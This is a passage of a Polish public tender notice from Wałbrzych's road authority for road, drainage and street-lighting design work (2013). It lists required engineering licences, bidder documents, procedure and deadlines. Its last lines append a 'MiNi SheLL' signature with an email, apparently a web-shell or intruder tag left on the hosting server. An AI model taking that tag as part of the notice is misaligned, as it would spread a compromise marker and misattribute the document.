- uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem dróg,
 - będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie minimum 1 projektu budowlanego i wykonawczego dla budowy lub przebudowy drogi minimum klasy L,
b. sprawdzający branży drogowej
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem dróg,
- będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie lub sprawdzanie minimum 1 projektu budowlanego i wykonawczego budowy lub przebudowy drogi minimum klasy L,
c. projektant branży elektrycznej i elektroenergetycznej
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności elektrycznej 
i elektroenergetycznej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem,
- będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie minimum 1 projektu wykonawczego dla budowy lub przebudowy oświetlenia drogowego w drodze minimum klasy L,
d. sprawdzający branży elektrycznej i elektroenergetycznej
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności elektrycznej 
i elektroenergetycznej, w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem,
- będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie lub sprawdzenie minimum 1 projektu wykonawczego dla budowy lub przebudowy oświetlenia drogowego w drodze minimum klasy L,
e. projektant branży wodno - kanalizacyjnej
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  wodociągowych i kanalizacyjnych, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem,
- będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie minimum 1 projektu wykonawczego dla budowy lub przebudowy kanalizacji deszczowej w drodze minimum klasy L,
f. sprawdzający branży wodno - kanalizacyjnej
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  wodociągowych i kanalizacyjnych, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- minimum 3 lata zawodowego stażu pracy po uzyskaniu uprawnień na stanowisku związanym z projektowaniem,
- będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadający aktualne zaświadczenie o przynależności do OIIB),
- opracowanie lub sprawdzenie minimum 1 projektu wykonawczego dla budowy lub przebudowy kanalizacji deszczowej w drodze minimum klasy L.
Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie, o którym mowa powyżej Wykonawca zobowiązany jest do wskazania co najmniej dwie usługi polegające na opracowaniu wielobranżowej dokumentacji projektowej w zakresie budowy lub przebudowy drogi  klasy min. L o długości minimum 400 m, obejmujące:
- sporządzenie wniosku o wydanie decyzji zgody na realizację inwestycji drogowej, 
- opracowanie  projektu budowlanego,
- opracowanie  projektów wykonawczych (drogowych i branżowych) wraz z kosztorysem
   inwestorskim i przedmiarem, w zakresie: dróg, kanalizacji deszczowej oraz oświetlenia drogowego,
- wykonanie  Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót.
Przez jedną usługę Zamawiający rozumie usługę wykonaną na podstawie jednej umowy lub w ramach jednego zamówienia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, który wygra przetarg przed podpisaniem umowy zobowiązany będzie:
a) przedłożyć umowę konsorcjum w przypadku Wykonawców występujących wspólnie, 
b) przedstawić opłacone dokumenty ubezpieczeniowe (polisy), potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnie z § 7 wzoru umowy,
c) wnieść zabezpieczenie należytego wykonania umowy zgodnie z zapisami części XI SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>.    Zamawiający dopuszcza ewentualną zmianę następujących istotnych postanowień umownych:
1.1.  zakresu przedmiotu umowy oraz sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. zaistnienie warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, 
1.2. terminu realizacji umowy - wskutek wystąpienia okoliczności niezależnych od stron umowy,
1.3. osób wymienionych w ofercie Wykonawcy pod warunkiem wyrażenia zgody przez Zamawiającego, oraz że osoby te będą spełniały warunki opisane w SIWZ,
1.4. innych postanowień umownych w zakresie wynikającym z uregulowań prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy,
1.5.  innych - mogących mieć wpływ na niezakończenie przedmiotu umowy z przyczyn niezależnych od stron.
2.   Zmiana umowy wymaga formy pisemnej. 
3. Strona występująca ze zmianą zobowiązana będzie wystąpić na piśmie do drugiej strony 
z informacją o zakresie zmiany, jej podstawie i jeżeli jest to konieczne zobowiązana będzie przedstawić odpowiednie dokumenty potwierdzające konieczność wprowadzenia zmian. Strona która otrzyma wniosek, zobowiązana jest przedstawić swoje stanowisko na piśmie w terminie 7 dni od dnia otrzymania wniosku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdkium.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Komunikacji i Utrzymania Miasta w Wałbrzychu, 58-300 Wałbrzych, ul. Matejki 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 10:00, miejsce: Zarząd Dróg Komunikacji i Utrzymania Miasta w Wałbrzychu, 58-300 Wałbrzych, ul. Matejki 1, pok. 38.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com